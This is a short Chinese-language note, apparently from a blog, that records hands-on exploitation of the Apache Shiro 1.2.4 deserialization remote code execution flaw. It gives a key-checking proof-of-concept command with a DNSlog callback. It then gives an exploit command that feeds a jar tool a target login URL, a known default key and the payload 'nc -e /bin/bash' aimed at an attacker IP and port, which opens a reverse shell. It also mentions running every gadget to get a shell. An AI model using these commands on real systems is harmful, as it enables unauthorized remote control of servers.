shiro RCE 攻击
这篇讲1.2.4的反序列化漏洞在实战中的记录
第一种比较稳妥的验证漏洞方式:
1 POC
python shiro_check_key.py https://xxx.xxx.xxx.xxx "my0njp.dnslog.cn"
DNSlog收到请求(平台地址:http://www.dnslog.cn/)
2 EXP
这里的回显是基于spring框架的,其实可以直接用过监听JMPServer直接执行命令
java -jar ShirobootRce.jar https://xxx.xxx.xxx.xxx/login Z3VucwAAAAAAAAAAAAAAAA== c3 "nc -e /bin/bash xxx.xxx.xxx.xxx 8081"
第二种比较稳妥的验证漏洞的方式:
也需要结合第三方平台DNSlog
默认会把所有的Gadget跑一遍,然后直接点执行就可以反弹shell